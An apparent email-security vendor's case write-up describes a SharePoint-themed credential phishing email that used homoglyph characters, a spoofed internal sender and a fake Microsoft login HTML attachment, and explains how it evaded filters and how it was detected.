In this attack, a company executive was targeted with an email that posed as documents being shared via SharePoint that required their review. The email mentions the shared documents are financial statements from the previous month that can be accessed by opening the “attached SharePoint link.” Throughout the body of the email, the attacker substituted multiple letters with similar-looking Cyrillic and Armenian characters. The email was sent from an address that was spoofed to look like it was coming from an internal account. The username of the spoofed account was set to “accounting,” matching the financial theme of the email.  

Status Bar Dots
Financial Document Phishing Email

An HTML file was attached to the email, which, when opened, rendered a webpage that mimicked a Microsoft login page that was prefilled with the recipient’s email address. Based on the context of the attack, the recipient was required to enter their account password into the page in order to view the financial documents.  

Status Bar Dots
Financial Document Phishing Page

Why It Bypassed Traditional Security

The attack replaced English letters with similar-looking foreign characters, which prevents threat detection tools relying on identifying known malicious text strings from identifying the email as a threat. Since the URL within the attachment has never been detected as malicious before, it can bypass traditional tools that rely on known bad indicators. The spoofed domain did not have an effective DMARC policy in place to reject any unauthorized senders that attempt to send emails from an address on the domain.

Detecting the Attack

HTML attachments are commonly used to deliver phishing payloads without having to include the malicious content in the email itself. An analysis of the HTML file identified a URL that had not been previously detected as malicious. A cloud email security platform can detect malicious emails based on the link's intent, along with other signals acquired through content analysis. The email failed SPF checks, indicating the sending email address was likely spoofed.

Risk to Organization

Because the sender’s email address has been spoofed to impersonate an internal account, an employee receiving the email may instinctively comply with the email since it appears to come from a trusted source. If an employee entered credentials into the phishing page, attackers would have full access to their email account, which they can then use to look for sensitive information or as a launch point for other attacks on the employee’s coworkers, customers, or vendors.

Analysis Overview

Vector

Payload-based

Goal

Credential Theft

Tactic

Foreign Character Substitution
Spoofed Email Address

Theme

Fake Document

Impersonated Brands

SharePoint

See How Abnormal Stops Emerging Attacks

See a Demo